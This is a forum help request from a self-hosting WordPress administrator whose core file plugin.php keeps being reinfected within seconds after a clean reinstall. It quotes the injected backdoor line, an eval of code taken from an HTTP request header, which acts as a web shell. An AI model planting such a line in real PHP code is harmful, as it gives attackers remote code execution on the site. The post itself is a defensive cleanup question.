Hello everyone.
I’ve remove malware successfully before but this one is beyond me.
100% sure it comes from the database, i deleted every single file except wp-config, all other a fresh copy of wordpress. database / admin and salts changed.
It only takes a few second to come back. file modified is /wp-includes/plugin.php
“@eval($\_SERVER\[‘HTTP\_58343C5’\]);” gets injected few seconds after new copy.
i searched the database for evals, base64 scripts iframe and nothing shows up.
starting fresh is always an option, i know. Do love to fix it, it can’t defeat us all 🙂
Appreciation in advance and happy new year.
Edit: forgot to add, i manage my own hosting, did reset apache after change just in case is on memory, every website is isolated, no other infections on server. Using ubuntu / virtualmin, everything up to date.
[ad_2]